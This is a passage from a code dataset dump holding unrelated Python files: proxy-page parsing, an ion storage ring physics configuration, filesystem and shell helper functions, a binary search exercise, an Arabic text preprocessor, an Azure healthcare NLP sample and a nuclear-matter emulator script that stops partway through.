PageResult(\n items=list(map(lambda x: HTTPSProxy(*x[:3]) if x[6].lower() == 'yes' else HTTPProxy(*x[:3]), entries))\n )\n\n\nclass UKPage(AnonPage):\n pass\n\n\nclass USPage(AnonPage):\n pass\n","sub_path":"free_proxies/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"215571950","text":"#!/usr/local/bin/python3\n# -*- coding: utf-8 -*-\n# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n# author: MingChao Ji\n# email: mingchao.ji@fysik.su.se\n# date created: 2020-01-15 13:25:52\n# last modified: 2020-03-06 13:39:07\n# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n\nfrom scipy.special import radian\n\nimport const\nimport func\nimport numpy as np\n# import pandas as pd\nimport periodictable as pt\n\n\n# for the reaction H+ + H- --> H + H, unit: eV, ker[2], n = 3 reaction, dominant at low cm energy\nker = [0.94, 0.57]\nbr_ratio = [0.5, 0.5] # branching ratio, 0.48 stands for 48 %\nn_ker = int(len(ker))\n\n# num of bins for hist, bin width for density\nnum_bins, bin_width = 500, 0.01\n\n# voltage range around zero center of mass energy\ndt_volt_slt = [0, 500]\n\n# ------------------------------------------Ion source settings----------------------------------------------\n# low energy platform (le)\nle_extra_volt = -13.60e3 # unit: V\nanion_mass = (pt.H[1].mass + pt.C[13].mass * 4)* const.amu_kg + const.electron_kg\nanion_charge = -1 # unit: e\nanion_ke = le_extra_volt * anion_charge # unit: eV\n# fwhm of the gaussian-like KE distribution = anion_ke * anion_ke_spread\nanion_ke_spread = 0.002\nanion_ke_sig = anion_ke * anion_ke_spread / 2.3548\n\n# high energy platform (he)\nhe_extra_volt = 4.5e3 # unit: V\ncation_mass = pt.O[16].mass * const.amu_kg - const.electron_kg # unit: kg\n# print(pt.H[1].mass, pt.He[4].mass)\ncation_charge = 1 # unit: e\ncation_ke = he_extra_volt * cation_charge\n# fwhm of the gaussian-like KE distribution = cation_ke 
* cation_ke_spread\ncation_ke_spread = 0.002\ncation_ke_sig = cation_ke * cation_ke_spread / 2.3548\n\n# calc the reduced mass\nreduced_mass = anion_mass * cation_mass / (anion_mass + cation_mass)\n# -----------------------------------------------------------------------------------------------------------\n\n\n# -----------------------------------------Desiree Rings settings--------------------------------------------\n# geometry of desiree setup\ncirc_ring_s, circ_ring_a = 8.68, 8.71 # unit: m, hereafter the same\nle_to_lebc, he_to_hebc = 3.25, 6.71\nlebc_to_s, lebc_to_a = 7.24, 9.39\nhebc_to_s, hebc_to_a = 9.93, 7.80\n\n# settings on drift tube\n# give the first and last tube numbers (from 1 to 7), if only one used, write one number\ndrift_tube_bias = [3, 5]\n\nms_ctr_to_imd = 1.690 # center, unit: m\n# distance from imd to: 10def center, dt1-7 start, dt7 end, 10 def center, interval shared by two neighbouring tubes\ndts_to_imd = [1.166, 1.410, 1.4875, 1.5665, 1.6505, 1.7295, 1.8135, 1.8925, 1.970, 2.214]\n# diff = [dist_to_imd[i+1] - dist_to_imd[i] for i in range(len(dist_to_imd)-1)]\ndt_first, dt_last = min(drift_tube_bias), max(drift_tube_bias)\ndt_ctr_to_imd = (dts_to_imd[dt_first] + dts_to_imd[dt_last + 1]) * 0.5\n\n# beam merge condition, assumed to be the best, 0.1 degree\nbeam_merge_deg = 0.0\nbeam_merge_rad = radian(beam_merge_deg, 0, 0)\n\n# to calc the minimum center of mass energy\ndrift_tube_volt = np.linspace(-2000, 2000, 4001) # unit: v\n\nanion_ke_tube = anion_ke - drift_tube_volt * anion_charge\ncation_ke_tube = cation_ke - drift_tube_volt * cation_charge\n\n# eV_J convert can be omitted on both sides\ncom_energy = reduced_mass * (anion_ke_tube / anion_mass + cation_ke_tube / cation_mass - 2 * np.sqrt(\n anion_ke_tube * cation_ke_tube / (anion_mass * cation_mass)) * np.cos(beam_merge_rad))\n# print(drift_tube_volt, com_energy)\n\n# find the min value of ecm_energy and the corresponding drift_tube_volt.\necm_min = np.min(com_energy)\necm_min_idx = com_energy.tolist().index(ecm_min)\n\n# to calc the signal at ~ 0 eV center of mass energy\ndt_cent_volt = drift_tube_volt[ecm_min_idx] # unit: V\n# -----------------------------------------------------------------------------------------------------------\n\n\n# ---------------------------------Detector & Data Acquisition Settings--------------------------------------\n# Imaging Detector\nimg_pixel = 352 # pix, calibrated from exp img\nimg_size = 75.0 # mm\nimg_resolution = img_size / img_pixel # mm/pix\n# print(img_resolution)\n\ntick_freq = 2083333\n\n# imd spot size, intensity discrimination\n# ref value to start: spot_size_diss = [0, 2000], spot_intensity_diss = [0, 1e5]\nspot_size_diss = [0, 8000]\nspot_intensity_diss = [0, 50000]\n\nmax_img_spots, img_count_diss = 6, 1 # max num of spots, plot discrimination\n\n# calibrated from 1 camac_time 1 spot event\n# ref to the y values of spots\nimd_strip_center = [353, 331.37, 309.65, 287.94, 266.71, 245.11, 221.44, 201.82, 179.73, 158.07, 137.43,\n 115.93, 93.26, 72.22, 50.33, 30.03]\n# print(imd_strip_center[::-1])\nimd_strip_hw = 20\n\n# data acquisition system\n# convert voltage to time, time = 500ns/10V + 95 ns\ntac_convert = [50, 180]\n\n# camac basic settings\ncamac_strips = 16\ncamac_time_diss = 20 # unit: ns\n\n# used in the camac time calibration\n# same discrimination as camac_time_diss, but without unit.\ncamac_value_diss = 180\n\n# input time = 16 * n + 25 unit: ns, might not be true, use the measured one for calibration\ncamac_convert = [16, 25]\n# camac time 
measured in exp during the calibration\ncamac_time = [18.96, 40.66, 61.17, 80.39, 98.04, 116.92, 135.43, 147.79, 157.17, 167.69, 177.80, 188.00, 197.00,\n 207.41, 217.23, 227.08]\n\n# match ratio diss when combining camaco and img files\nmatch_ratio_diss = 0.6\n\n# create a list of offset to correct the frame id\nmax_id_offset = 5\n# create a list of offset numbers for img\nid_offset = [[0] if i == 0 else [-i, i] for i in range(max_id_offset + 1)]\nframe_id_offset = sum(id_offset, [])\n# print(frame_id_offset)\n\nmax_cycle_offset = 20\n# create a list of offset numbers for storage cycle num\ncycle_num_offset = [j for j in range(max_cycle_offset + 1)]\n# print(cycle_num_offset)\n# -----------------------------------------------------------------------------------------------------------\n\n\n# ---------------------------------------Simple Calcs & Print2Screen-----------------------------------------\nprint2scr = False\n\n# simple calcs\nanion_speed = func.ke2speed(anion_ke, anion_mass) # unit: m/s\ncation_speed = func.ke2speed(cation_ke, cation_mass) # unit: m/s\n\ntof_le_to_s = (le_to_lebc + lebc_to_s) * 1.0e6 / anion_speed # us\ntof_le_to_a = (le_to_lebc + lebc_to_a) * 1.0e6 / anion_speed # us\ntof_he_to_s = (he_to_hebc + hebc_to_s) * 1.0e6 / cation_speed # us\ntof_he_to_a = (he_to_hebc + hebc_to_a) * 1.0e6 / cation_speed # us\n\nrev_time_s = circ_ring_s * 1e6 / cation_speed # unit: microsec\nrev_time_a = circ_ring_a * 1e6 / anion_speed # unit: microsec\n\nneutral_speed = anion_speed\nimd_gate_delay = ms_ctr_to_imd * 1.0e6 / neutral_speed # unit: us\n\nif print2scr is True:\n print('le ion speed (m/s): {0}'\n '\\nhe ion speed (m/s): {1}\\n'\n '\\ntof le to s-ring (us): {2}'\n '\\ntof he to a-ring (us): {3}\\n'\n '\\ns-ring revolution period (us): {4}'\n '\\na-ring revolution period (us): {5}\\n'\n '\\nid signal delay (us): {6}'\n '\\n'.format(str(anion_speed), str(cation_speed), str(tof_le_to_s), str(tof_he_to_a), str(rev_time_s), str(rev_time_a), str(imd_gate_delay)))\n#------------------------------------------------------------------------------------------------------------\n","sub_path":"desiree.py","file_name":"desiree.py","file_ext":"py","file_size_in_byte":7198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"528170711","text":"#\n# Copyright (c) 2013, Prometheus Research, LLC\n#\n\n\nfrom .core import env, debug, fail\nimport sys\nimport os\nimport shutil\nimport shlex\nimport subprocess\n\n\ndef cp(src_path, dst_path):\n \"\"\"Copy a file or a directory.\"\"\"\n debug(\"cp {} {}\", src_path, dst_path)\n if os.path.isfile(src_path):\n shutil.copy2(src_path, dst_path)\n elif os.path.islink(src_path):\n link = os.readlink(src_path)\n os.symlink(link, dst_path)\n else:\n if os.path.exists(dst_path):\n dst_path = os.path.join(dst_path, os.path.basename(src_path))\n os.mkdir(dst_path)\n for filename in os.listdir(src_path):\n with env(debug=False):\n cp(os.path.join(src_path, filename),\n os.path.join(dst_path, filename))\n\n\ndef mv(src_path, dst_path):\n \"\"\"Rename a file.\"\"\"\n debug(\"mv {} {}\", src_path, dst_path)\n os.rename(src_path, dst_path)\n\n\ndef rm(path):\n \"\"\"Remove a file.\"\"\"\n debug(\"rm {}\", path)\n os.unlink(path)\n\n\ndef rmtree(path):\n \"\"\"Remove a directory tree.\"\"\"\n debug(\"rmtree {}\", path)\n shutil.rmtree(path)\n\n\ndef mktree(path):\n \"\"\"Create a directory tree.\"\"\"\n if not os.path.isdir(path):\n debug(\"mktree {}\", path)\n os.makedirs(path)\n\n\ndef exe(cmd, cd=None, 
environ=None):\n \"\"\"Execute the command replacing the current process.\"\"\"\n debug(\"{}\", cmd)\n if isinstance(cmd, str):\n cmd = shlex.split(cmd)\n if environ:\n overrides = environ\n environ = os.environ.copy()\n environ.update(overrides)\n if cd:\n os.chdir(cd)\n if hasattr(sys, 'exitfunc'):\n sys.exitfunc()\n try:\n if environ:\n os.execvpe(cmd[0], cmd, environ)\n else:\n os.execvp(cmd[0], cmd)\n except OSError as exc:\n raise fail(str(exc))\n\n\ndef sh(cmd, data=None, cd=None, environ=None):\n \"\"\"Execute a command using shell.\"\"\"\n if cd is None:\n debug(\"{}\", cmd)\n else:\n debug(\"cd {}; {}\", cd, cmd)\n stream = subprocess.PIPE\n if env.debug:\n stream = None\n if environ:\n overrides = environ\n environ = os.environ.copy()\n environ.update(overrides)\n proc = subprocess.Popen(cmd, shell=True, stdin=stream,\n stdout=stream, stderr=stream,\n cwd=cd, env=environ)\n proc.communicate(data)\n if proc.returncode != 0:\n raise fail(\"`{}`: non-zero exit code\", cmd)\n\n\ndef pipe(cmd, data=None, cd=None, environ=None):\n \"\"\"Execute the command, return the output.\"\"\"\n if cd is None:\n debug(\"| {}\", cmd)\n else:\n debug(\"$ cd {}; | {}\", cd, cmd)\n stream = subprocess.PIPE\n if environ:\n overrides = environ\n environ = os.environ.copy()\n environ.update(overrides)\n proc = subprocess.Popen(cmd, shell=True,\n stdout=stream, stderr=stream,\n cwd=cd, env=environ)\n out, err = proc.communicate(data)\n if proc.returncode != 0:\n if env.debug:\n if out:\n sys.stdout.write(out)\n if err:\n sys.stderr.write(err)\n raise fail(\"`{}`: non-zero exit code\", cmd)\n return out\n\n","sub_path":"src/rex.ctl/src/rex/ctl/fs.py","file_name":"fs.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"470424930","text":"# TO-DO: Implement a recursive implementation of binary search\nimport math\ndef binary_search(arr, target, start, end):\n # Your code here\n if len(arr) == 0:\n return -1\n mid = math.floor((start + end)/2)\n if arr[mid] == target:\n return mid\n elif start >= end:\n return -1\n else:\n if target > arr[mid]:\n return binary_search(arr, target, mid + 1, end)\n else:\n return binary_search(arr, target, start, mid - 1)\n\n# STRETCH: implement an order-agnostic binary search\n# This version of binary search should correctly find \n# the target regardless of whether the input array is\n# sorted in ascending order or in descending order\n# You can implement this function either recursively \n# or iteratively\ndef agnostic_binary_search(arr, target, start=0, end=None):\n # Your code here\n if len(arr) == 0:\n return -1\n if end == None:\n end = len(arr) - 1\n # dir = -1 if array is descending, 1 if ascending\n dir = -1 if arr[0] > arr[-1] else 1\n mid = math.floor((start + end)/2)\n if arr[mid] == target:\n return mid\n elif start >= end:\n return -1\n else:\n if dir * target > dir * arr[mid]:\n return agnostic_binary_search(arr, target, mid + 1, end)\n else:\n return agnostic_binary_search(arr, target, start, mid - 1)","sub_path":"src/searching/searching.py","file_name":"searching.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"314224245","text":"from __future__ import print_function\n\nimport json\nimport logging\nimport sys\nimport os\nthis_dir = 
os.path.dirname(os.path.realpath(__file__))\nsys.path.append(\"{0}/../lib\".format(this_dir))\nsys.path.append(\"{0}/../src\".format(this_dir))\nfrom jsonschema import validate\nfrom generator.generator import convert_to_imacro\n\nlog = logging.getLogger()\nlog.setLevel(logging.DEBUG)\n\n\ndef handler(event, context):\n # input_json = json.dumps(event)\n with open(os.path.join(this_dir, '../resources/schema.json'), 'r') as myfile:\n schema = json.loads(myfile.read())\n try:\n validate(event, schema)\n except Exception as e:\n return \"The input failed validation\\n{0}\".format(repr(e))\n try:\n output = convert_to_imacro(event)\n except Exception as e:\n return \"An internal error occurred during response generation\\n{0}\".format(repr(e))\n return output\n","sub_path":"serverless-autotravel-python/functions/generate/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"490256500","text":"#%%\r\nimport re\r\nimport pyarabic.araby as araby\r\n#%%\r\nfrom py4j.java_gateway import JavaGateway\r\n\r\ngateway = JavaGateway.launch_gateway(classpath='./bert/FarasaSegmenterJar.jar')\r\nfarasa = gateway.jvm.com.qcri.farasa.segmenter.Farasa()\r\n#%%\r\n\r\nprefix_list = [\"ال\", \"و\", \"ف\", \"ب\", \"ك\", \"ل\", \"لل\", \"\\u0627\\u0644\", \"\\u0648\", \"\\u0641\", \"\\u0628\", \"\\u0643\", \"\\u0644\", \"\\u0644\\u0644\", \"س\"]\r\nsuffix_list = [\"ه\", \"ها\", \"ك\", \"ي\", \"هما\", \"كما\", \"نا\", \"كم\", \"هم\", \"هن\", \"كن\",\r\n \"ا\", \"ان\", \"ين\", \"ون\", \"وا\", \"ات\", \"ت\", \"ن\", \"ة\",\r\n \"\\u0647\", \"\\u0647\\u0627\", \"\\u0643\", \"\\u064a\", \"\\u0647\\u0645\\u0627\", \"\\u0643\\u0645\\u0627\", \"\\u0646\\u0627\", \"\\u0643\\u0645\", \"\\u0647\\u0645\", \"\\u0647\\u0646\", \"\\u0643\\u0646\",\r\n \"\\u0627\", \"\\u0627\\u0646\", \"\\u064a\\u0646\", \"\\u0648\\u0646\", \"\\u0648\\u0627\", \"\\u0627\\u062a\", \"\\u062a\", \"\\u0646\", \"\\u0629\" ]\r\n\r\n\r\nregex_url = r'(http(s)?:\\/\\/.)?(www\\.)?[-a-zA-Z0-9@:%._\\+~#=]{2,256}\\.[a-z]{2,6}\\b([-a-zA-Z0-9@:%_\\+.~#?&//=]*)'\r\nregex_mention = r'@[\\w\\d]+'\r\nregex_email = r'\\S+@\\S+'\r\nredundant_punct_pattern = r'([!\\\"#\\$%\\'\\(\\)\\*\\+,\\.:;\\-<=·>?@\\[\\\\\\]\\^_ـ`{\\|}~—٪’،؟`୍“؛”ۚ【»؛\\s+«–…‘]{2,})'\r\n#%%\r\n\r\ndef remove_elongation(word):\r\n\t\"\"\"\r\n :param word: the input word to remove elongation\r\n :return: de-elongated word\r\n \"\"\"\r\n\tregex_tatweel = r'(\\w)\\1{2,}'\r\n\t# loop over the number of times the regex matched the word\r\n\tfor index_ in range(len(re.findall(regex_tatweel, word))):\r\n\t\tif re.search(regex_tatweel, word):\r\n\t\t\telongation_found = re.search(regex_tatweel, word)\r\n\t\t\telongation_replacement = elongation_found.group()[0]\r\n\t\t\telongation_pattern = elongation_found.group()\r\n\t\t\tword = re.sub(elongation_pattern, elongation_replacement, word, flags=re.MULTILINE)\r\n\t\telse:\r\n\t\t\tbreak\r\n\treturn word\r\n\r\n#%%\r\n\r\ndef tokenize_arabic_words_farasa(line_input):\r\n segmented_line=[]\r\n line_farasa = farasa.segmentLine(line_input)\r\n for index , word in enumerate(line_farasa):\r\n if word in ['[',']']:\r\n continue\r\n if word in ['رابط','بريد','مستخدم'] and line_farasa[index-1] in ['[',']']:\r\n segmented_line.append('['+word+']')\r\n continue\r\n segmented_word=[]\r\n for token in word.split('+'):\r\n if token in prefix_list:\r\n segmented_word.append(token+'+')\r\n elif token in suffix_list:\r\n 
segmented_word.append('+'+token)\r\n else:\r\n segmented_word.append(token)\r\n segmented_line.extend(segmented_word)\r\n\r\n return ' '.join(segmented_line)\r\n\r\n\r\ndef remove_redundant_punct(text):\r\n\ttext_ = text\r\n\tresult = re.search(redundant_punct_pattern, text)\r\n\tdif = 0\r\n\twhile result:\r\n\t\tsub = result.group()\r\n\t\tsub = sorted(set(sub), key=sub.index)\r\n\t\tsub = ' ' + ''.join(list(sub)) + ' '\r\n\t\ttext = ''.join((text[:result.span()[0]+dif], sub, text[result.span()[1]+dif:]))\r\n\t\ttext_ = ''.join((text_[:result.span()[0]], text_[result.span()[1]:])).strip()\r\n\t\tdif = abs(len(text) - len(text_))\r\n\t\tresult = re.search(redundant_punct_pattern, text_)\r\n\ttext = re.sub(r'\\s+', ' ', text)\r\n\treturn text.strip()\r\n\r\n#%%\r\n\r\ndef preprocess(text, do_farasa_tokenization=True):\r\n\ttext=str(text)\r\n\tprocessing_tweet = araby.strip_tashkeel(text)\r\n\tprocessing_tweet = re.sub(r'\\d+\\/[ء-ي]+\\/\\d+\\]', '', processing_tweet)\r\n\t#processing_tweet = re.sub(r'\\d+([,\\d]+)?', '[رقم]', processing_tweet)\r\n\tprocessing_tweet = re.sub('ـ', '', processing_tweet)\r\n\tprocessing_tweet = re.sub(regex_url, '[رابط]', processing_tweet)\r\n\tprocessing_tweet = re.sub(regex_email, '[بريد]', processing_tweet)\r\n\tprocessing_tweet = re.sub(regex_mention, '[مستخدم]', processing_tweet)\r\n\tprocessing_tweet = re.sub('…', r'\\.', processing_tweet).strip()\r\n\tprocessing_tweet = remove_redundant_punct(processing_tweet)\r\n\r\n\t#processing_tweet = re.sub(r'\\[ رقم \\]|\\[رقم \\]|\\[ رقم\\]', ' [رقم] ', processing_tweet)\r\n\tprocessing_tweet = re.sub(r'\\[ رابط \\]|\\[ رابط\\]|\\[رابط \\]', ' [رابط] ', processing_tweet)\r\n\tprocessing_tweet = re.sub(r'\\[ بريد \\]|\\[ بريد\\]|\\[بريد \\]', ' [بريد] ', processing_tweet)\r\n\tprocessing_tweet = re.sub(r'\\[ مستخدم \\]|\\[ مستخدم\\]|\\[مستخدم \\]', ' [مستخدم] ', processing_tweet)\r\n\r\n\tprocessing_tweet = remove_elongation(processing_tweet)\r\n\tif do_farasa_tokenization:\r\n\t processing_tweet = tokenize_arabic_words_farasa(processing_tweet)\r\n\treturn processing_tweet.strip()\r\n","sub_path":"preprocess_arabert.py","file_name":"preprocess_arabert.py","file_ext":"py","file_size_in_byte":4487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"339503622","text":"# -------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\n\n\"\"\"\nFILE: sample_analyze_healthcare_entities.py\n\nDESCRIPTION:\n This sample demonstrates how to detect healthcare entities in a batch of documents.\n\n In this sample we will be a newly-hired engineer working in a pharmacy. 
We are going to\n comb through all of the prescriptions our pharmacy has fulfilled so we can catalog how\n much inventory we have.\n\nUSAGE:\n python sample_analyze_healthcare_entities.py\n\n Set the environment variables with your own values before running the sample:\n 1) AZURE_LANGUAGE_ENDPOINT - the endpoint to your Language resource.\n 2) AZURE_LANGUAGE_KEY - your Language subscription key\n\"\"\"\n\n\ndef sample_analyze_healthcare_entities() -> None:\n\n print(\n \"In this sample we will be combing through the prescriptions our pharmacy has fulfilled \"\n \"so we can catalog how much inventory we have\"\n )\n print(\n \"We start out with a list of prescription documents.\"\n )\n\n # [START analyze_healthcare_entities]\n import os\n import typing\n from azure.core.credentials import AzureKeyCredential\n from azure.ai.textanalytics import TextAnalyticsClient, HealthcareEntityRelation\n\n endpoint = os.environ[\"AZURE_LANGUAGE_ENDPOINT\"]\n key = os.environ[\"AZURE_LANGUAGE_KEY\"]\n\n text_analytics_client = TextAnalyticsClient(\n endpoint=endpoint,\n credential=AzureKeyCredential(key),\n )\n\n documents = [\n \"\"\"\n Patient needs to take 100 mg of ibuprofen, and 3 mg of potassium. Also needs to take\n 10 mg of Zocor.\n \"\"\",\n \"\"\"\n Patient needs to take 50 mg of ibuprofen, and 2 mg of Coumadin.\n \"\"\"\n ]\n\n poller = text_analytics_client.begin_analyze_healthcare_entities(documents)\n result = poller.result()\n\n docs = [doc for doc in result if not doc.is_error]\n\n print(\"Let's first visualize the outputted healthcare result:\")\n for doc in docs:\n for entity in doc.entities:\n print(f\"Entity: {entity.text}\")\n print(f\"...Normalized Text: {entity.normalized_text}\")\n print(f\"...Category: {entity.category}\")\n print(f\"...Subcategory: {entity.subcategory}\")\n print(f\"...Offset: {entity.offset}\")\n print(f\"...Confidence score: {entity.confidence_score}\")\n if entity.data_sources is not None:\n print(\"...Data Sources:\")\n for data_source in entity.data_sources:\n print(f\"......Entity ID: {data_source.entity_id}\")\n print(f\"......Name: {data_source.name}\")\n if entity.assertion is not None:\n print(\"...Assertion:\")\n print(f\"......Conditionality: {entity.assertion.conditionality}\")\n print(f\"......Certainty: {entity.assertion.certainty}\")\n print(f\"......Association: {entity.assertion.association}\")\n for relation in doc.entity_relations:\n print(f\"Relation of type: {relation.relation_type} has the following roles\")\n for role in relation.roles:\n print(f\"...Role '{role.name}' with entity '{role.entity.text}'\")\n print(\"------------------------------------------\")\n\n print(\"Now, let's get all of medication dosage relations from the documents\")\n dosage_of_medication_relations = [\n entity_relation\n for doc in docs\n for entity_relation in doc.entity_relations if entity_relation.relation_type == HealthcareEntityRelation.DOSAGE_OF_MEDICATION\n ]\n # [END analyze_healthcare_entities]\n\n print(\n \"Now, I will create a dictionary of medication to total dosage. \"\n \"I will use a regex to extract the dosage amount. 
For simplicity's sake, I will assume \"\n \"all dosages are represented with numbers and have mg unit.\"\n )\n import re\n from collections import defaultdict\n\n medication_to_dosage: typing.Dict[str, int] = defaultdict(int)\n\n for relation in dosage_of_medication_relations:\n # The DosageOfMedication relation should only contain the dosage and medication roles\n\n dosage_role = next(iter(filter(lambda x: x.name == \"Dosage\", relation.roles)))\n medication_role = next(iter(filter(lambda x: x.name == \"Medication\", relation.roles)))\n\n try:\n dosage_value = int(re.findall(r\"\\d+\", dosage_role.entity.text)[0]) # we find the numbers in the dosage\n medication_to_dosage[medication_role.entity.text] += dosage_value\n except IndexError:\n # Error handling for when the dosage text contains no numbers.\n pass\n\n for medication, dosage in medication_to_dosage.items():\n print(\"We have fulfilled '{}' total mg of '{}'\".format(\n dosage, medication\n ))\n\n\nif __name__ == \"__main__\":\n sample_analyze_healthcare_entities()\n","sub_path":"sdk/textanalytics/azure-ai-textanalytics/samples/sample_analyze_healthcare_entities.py","file_name":"sample_analyze_healthcare_entities.py","file_ext":"py","file_size_in_byte":5112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"45228725","text":"import os\nimport numpy as np\nimport math\nimport re\nimport scipy.linalg as spla\nfrom scipy import interpolate\nimport matplotlib.pyplot as plt # used by the plotting section at the bottom of this script\n\n\n######################################################\n######################################################\n### generate random LECs set\n######################################################\n######################################################\ndef generate_random_LEC(LEC,LEC_range):\n LEC_max = LEC * ( 1 + LEC_range)\n LEC_min = LEC * ( 1 - LEC_range)\n LEC_random = np.zeros(LEC_num)\n for loop1 in range (LEC_num):\n LEC_random[loop1] = LEC_min[loop1] + np.random.rand(1) * (LEC_max[loop1] - LEC_min[loop1])\n return LEC_random\n\n\n######################################################\n######################################################\n### read LECs set from file\n######################################################\n######################################################\ndef read_LEC(file_path):\n LEC = np.zeros(LEC_num)\n with open(file_path,'r') as f_1:\n count = len(open(file_path,'r').readlines())\n data = f_1.readlines()\n wtf = re.match('#', 'abc',flags=0)\n for loop1 in range(0,count):\n if ( re.search('cE and cD', data[loop1],flags=0) != wtf):\n temp_1 = re.findall(r\"[-+]?\\d+\\.?\\d*\",data[loop1+1])\n LEC[0] = float(temp_1[0])\n LEC[1] = float(temp_1[1])\n if ( re.search('LEC ci', data[loop1],flags=0) != wtf):\n temp_1 = re.findall(r\"[-+]?\\d+\\.?\\d*\",data[loop1+1])\n LEC[2] = float(temp_1[0])\n LEC[3] = float(temp_1[1])\n LEC[4] = float(temp_1[2])\n LEC[5] = float(temp_1[3])\n if ( re.search('c1s0 & c3s1', data[loop1],flags=0) != wtf):\n temp_1 = re.findall(r\"[-+]?\\d+\\.?\\d*\",data[loop1+1])\n LEC[6] = float(temp_1[0])\n LEC[7] = float(temp_1[1])\n LEC[8] = float(temp_1[2])\n LEC[9] = float(temp_1[3])\n if ( re.search('cnlo', data[loop1],flags=0) != wtf):\n temp_1 = re.findall(r\"[-+]?\\d+\\.?\\d*\",data[loop1+1])\n LEC[10] = float(temp_1[0])\n LEC[11] = float(temp_1[1])\n LEC[12] = float(temp_1[2])\n LEC[13] = float(temp_1[3])\n LEC[14] = float(temp_1[4])\n LEC[15] = float(temp_1[5])\n LEC[16] = float(temp_1[6])\n return 
LEC\n\n######################################################\n######################################################\n### generate nuclear matter infile\n######################################################\n######################################################\ndef output_ccm_in_file(file_path,vec_input,particle_num,matter_type,density,nmax,option):\n with open(file_path,'w') as f_1:\n f_1.write('!Chiral order for Deltas(LO = 0,NLO=2,NNLO=3,N3LO=4) and cutoff'+'\\n')\n f_1.write('3, 450\\n')\n f_1.write('! cE and cD 3nf parameters:'+'\\n' )\n f_1.write('%.12f, %.12f\\n' % (vec_input[0],vec_input[1]))\n f_1.write('! LEC ci \\n')\n f_1.write('%.12f, %.12f, %.12f, %.12f \\n' % (vec_input[2],vec_input[3],vec_input[4],vec_input[5]))\n f_1.write('!c1s0 & c3s1 \\n')\n f_1.write('%.12f, %.12f, %.12f, %.12f, %.12f, %.12f \\n' % (vec_input[6],vec_input[7],vec_input[8],vec_input[9],vec_input[9],vec_input[9]))\n f_1.write('! cnlo(7) \\n')\n f_1.write('%.12f, %.12f, %.12f, %.12f, %.12f, %.12f, %.12f \\n' % (vec_input[10],vec_input[11],vec_input[12],vec_input[13],vec_input[14],vec_input[15],vec_input[16]))\n f_1.write('! number of particles'+'\\n')\n f_1.write('%d\\n' % (particle_num) )\n f_1.write('! specify: pnm/snm, input type: density/kfermi'+'\\n')\n f_1.write(matter_type+', density'+'\\n')\n f_1.write('! specify boundary conditions (PBC/TABC/TABCsp/subspace_cal/subspace_cal_dens/solve_general_EV)'+'\\n')\n f_1.write('%-20s \\n' % (option))\n f_1.write('! dens/kf, ntwist, nmax'+'\\n')\n f_1.write('%.12f, 1, %d\\n' % (density, nmax))\n f_1.write('! specify cluster approximation: CCD, CCDT'+'\\n')\n f_1.write('CCD(T)'+'\\n')\n f_1.write('! tnf switch (T/F) and specify 3nf approximation: 0=tnf0b, 1=tnf1b, 2=tnf2b'+'\\n')\n f_1.write('T, 3'+'\\n')\n f_1.write('! 3nf cutoff(MeV),non-local reg. 
exp'+'\\n')\n f_1.write('450, 3'+'\\n')\n\n\n\n######################################################\n######################################################\n### read ccm_nuclear_matter output\n######################################################\n######################################################\ndef read_nucl_matt_out(file_path): # converged: flag = 1, not converged: flag = 0\n with open(file_path,'r') as f_1:\n converge_flag = int (1)\n count = len(open(file_path,'r').readlines())\n #if ( count > 1500 ):\n # converge_flag =int (0)\n data = f_1.readlines()\n wtf = re.match('#', 'abc',flags=0)\n ccd = 0\n for loop1 in range(0,count):\n if ( re.search('CCD energy', data[loop1],flags=0) != wtf):\n temp_1 = re.findall(r\"[-+]?\\d+\\.?\\d*\",data[loop1])\n ccd = float(temp_1[0])\n return ccd #,converge_flag\n #print ('No \"E/A\" found in the file:'+file_path)\n #return float('nan')\n\n\n\n######################################################\n######################################################\n### call CCM_nuclear_matter\n######################################################\n######################################################\ndef nuclear_matter(vec_input,dens):\n neutron_num = 14\n particle_num = 28\n density = dens\n density_min = 0.14\n density_max = 0.22\n nmax = 2\n #snm_dens = np.zeros(5)\n #snm_energy_per_nucleon = np.zeros(5)\n #snm_dens_new = np.zeros(interpolation_count)\n #snm_energy_per_nucleon_new = np.zeros(interpolation_count)\n\n nucl_matt_in_dir = './ccm_in_pnm_%.2f' % (density)\n nucl_matt_out_dir = './pnm_rho_%.2f.out' % (density)\n option = 'PBC'\n output_ccm_in_file(nucl_matt_in_dir,vec_input,neutron_num,'pnm',density,nmax,option)\n os.system('./'+nucl_matt_exe+' '+nucl_matt_in_dir+' > '+nucl_matt_out_dir) \n ccd = read_nucl_matt_out(nucl_matt_out_dir)\n print (\"ccd energy from real CC calculation: \"+str(ccd))\n return ccd\n\n\n######################################################\n######################################################\n### Emulator!!!\n######################################################\n######################################################\ndef emulator(LEC_target,dens):\n neutron_num = 14\n particle_num = 28\n density = dens\n density_min = 0.14\n density_max = 0.22\n nmax = 2\n nucl_matt_in_dir = './ccm_in_pnm_%.2f' % (dens)\n nucl_matt_out_dir = './pnm_rho_%.2f.out' % (dens)\n option = 'solve_general_EV' \n output_ccm_in_file(nucl_matt_in_dir,LEC_target,neutron_num,'pnm',density,nmax,option)\n os.system('./'+nucl_matt_exe+' '+nucl_matt_in_dir+' > '+nucl_matt_out_dir) \n \n H = np.zeros((subspace_dimension,subspace_dimension))\n N = np.zeros((subspace_dimension,subspace_dimension))\n K = np.zeros((subspace_dimension,subspace_dimension))\n\n in_dir = \"./H_matrix.txt\"\n H = 